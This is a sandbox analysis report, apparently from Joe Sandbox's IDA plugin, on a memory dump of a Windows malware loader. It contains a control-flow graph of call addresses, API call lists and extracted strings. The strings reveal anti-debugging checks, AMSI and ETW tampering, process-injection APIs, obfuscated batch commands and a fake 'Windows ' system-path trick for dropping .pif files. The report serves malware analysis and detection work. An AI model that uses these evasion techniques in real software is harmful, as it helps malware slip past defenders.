call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84d8c * 2 call 2b84734 call 2b9dacc 2660->2688 3577 2ba5c36-2ba5e35 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 2688->3577 3122 2ba7c6d-2ba7e40 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84798 call 2b8494c call 2b84d20 call 2b84d9c CreateProcessAsUserW 2879->3122 3123 2ba8af1-2ba8c74 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 2879->3123 3846 2ba758d-2ba7590 2880->3846 3847 2ba7592-2ba7854 call 2b95a74 call 2b84b78 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b849a4 call 2b97dd8 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9af58 2880->3847 3145 2ba3cd1-2ba40ff call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b9e540 call 2b84798 call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87e18 2903->3145 3146 2ba3c76-2ba3ccc call 2b9e198 call 2b84d8c call 2b84734 call 2b84d8c call 2b9dacc 2903->3146 2904->2903 3393 2ba7ebe-2ba7fc9 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 3122->3393 3394 2ba7e42-2ba7eb9 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 3122->3394 3359 2ba8c7a-2ba8c89 call 2b84898 3123->3359 3360 2ba9420-2baaa25 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 * 16 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b97b98 call 2b9818c call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 ExitProcess 3123->3360 3877 2ba4101-2ba4142 call 2b84d8c * 2 call 2b84734 call 2b9dacc 3145->3877 3878 2ba4147-2ba4590 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b87e18 3145->3878 3146->3145 3359->3360 3380 2ba8c8f-2ba8f62 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e540 call 2b8480c call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87e18 3359->3380 3882 2ba921a-2ba941b call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b849a4 call 2b98bb0 3380->3882 3883 2ba8f68-2ba9215 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84d8c * 2 call 2b84734 call 2b9dacc 3380->3883 3586 2ba7fcb-2ba7fce 3393->3586 3587 2ba7fd0-2ba82f0 call 2b849a4 call 2b9dc90 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9cfa4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 3393->3587 3394->3393 3948 2ba5e3b-2ba6094 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b84d20 call 2b84d8c call 2b84734 call 2b9dacc 3577->3948 3949 2ba6099-2ba67bc call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b836a0 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b82f08 call 2b8794c call 2b84798 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b82f08 call 2b8794c call 2b84798 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b836d0 3577->3949 3586->3587 4217 2ba8309-2ba8aec call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 ResumeThread call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 CloseHandle call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b97ed4 call 2b987a0 * 6 CloseHandle call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 3587->4217 4218 2ba82f2-2ba8304 call 2b98584 3587->4218 3846->3847 4487 2ba7859-2ba7870 call 2b836d0 3847->4487 3877->3878 4673 2ba45ed-2ba4846 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b8480c call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b87e18 3878->4673 4674 2ba4592-2ba45e8 call 2b9e198 call 2b84d8c call 2b84734 call 2b84d8c call 2b9dacc 3878->4674 3882->3360 3883->3882 3948->3949 4217->3123 4218->4217 4958 2ba4848-2ba489e call 2b9e198 call 2b84d8c call 2b84734 call 2b84d8c call 2b9dacc 4673->4958 4959 2ba48a3-2ba4c73 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b8494c call 2b98410 Sleep call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84d20 call 2b9da44 call 2b84d20 call 2b9da44 call 2b8480c call 2b8494c * 2 MoveFileA call 2b8480c call 2b8494c * 2 MoveFileA call 2b8494c call 2b84d20 call 2b9da44 call 2b8494c call 2b84d20 call 2b9da44 call 2b8494c call 2b84d20 call 2b9da44 4673->4959 4674->4673 4958->4959 4959->2013
                          APIs
                          • InetIsOffline.URL(00000000,00000000,02BAAFA1,?,?,?,000002F7,00000000,00000000), ref: 02B9ECAE
                            • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                            • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                            • Part of subcall function 02B9EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
                            • Part of subcall function 02B9EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC
                            • Part of subcall function 02B9EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
                            • Part of subcall function 02B9EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
                            • Part of subcall function 02B9EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29
                            • Part of subcall function 02B87E18: GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                            • Part of subcall function 02B8C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD58C8,?,02B9FBFE,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession), ref: 02B8C303
                            • Part of subcall function 02B9DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
                            • Part of subcall function 02B9DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
                            • Part of subcall function 02B9DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
                            • Part of subcall function 02B9DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
                            • Part of subcall function 02B9DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65
                            • Part of subcall function 02B87E3C: GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47
                            • Part of subcall function 02B87FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02BA2BE7,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8), ref: 02B87FDD
                            • Part of subcall function 02B9DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                            • Part of subcall function 02B9DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                            • Part of subcall function 02B9DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                            • Part of subcall function 02B9DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                            • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                            • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                            • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                            • Part of subcall function 02B9870C: LoadLibraryW.KERNEL32(amsi), ref: 02B98715
                            • Part of subcall function 02B9870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B98774
                          • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,02BAB330), ref: 02BA49B7
                            • Part of subcall function 02B9DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                            • Part of subcall function 02B9DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                            • Part of subcall function 02B9DA44: NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4BB7
                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4C0D
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                          • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                          • API String ID: 3130226682-181751239
                          • Opcode ID: 32c8684d3529b0eb55f6225c1a1e6ff44d221d71579bc7f024b0bd251e8c8641
                          • Instruction ID: 098ad59d5bc330fa4f5b6df91f75e883efe6ca7e42804aa58f6b28ca9d16d745
                          • Opcode Fuzzy Hash: 32c8684d3529b0eb55f6225c1a1e6ff44d221d71579bc7f024b0bd251e8c8641
                          • Instruction Fuzzy Hash: F4241875A5015A8FDB25FB64CC90ADE73B6BF89304F1044E6E10DEB254EA31AE86CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5547 2b85a78-2b85ab9 GetModuleFileNameA RegOpenKeyExA 5548 2b85afb-2b85b3e call 2b858b4 RegQueryValueExA 5547->5548 5549 2b85abb-2b85ad7 RegOpenKeyExA 5547->5549 5556 2b85b40-2b85b5c RegQueryValueExA 5548->5556 5557 2b85b62-2b85b7c RegCloseKey 5548->5557 5549->5548 5550 2b85ad9-2b85af5 RegOpenKeyExA 5549->5550 5550->5548 5552 2b85b84-2b85bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5554 2b85bbb-2b85bbf 5552->5554 5555 2b85c9e-2b85ca5 5552->5555 5559 2b85bcb-2b85be1 lstrlenA 5554->5559 5560 2b85bc1-2b85bc5 5554->5560 5556->5557 5561 2b85b5e 5556->5561 5562 2b85be4-2b85be7 5559->5562 5560->5555 5560->5559 5561->5557 5563 2b85be9-2b85bf1 5562->5563 5564 2b85bf3-2b85bfb 5562->5564 5563->5564 5565 2b85be3 5563->5565 5564->5555 5566 2b85c01-2b85c06 5564->5566 5565->5562 5567 2b85c08-2b85c2e lstrcpynA LoadLibraryExA 5566->5567 5568 2b85c30-2b85c32 5566->5568 5567->5568 5568->5555 5569 2b85c34-2b85c38 5568->5569 5569->5555 5570 2b85c3a-2b85c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5555 5571 2b85c6c-2b85c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5555
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
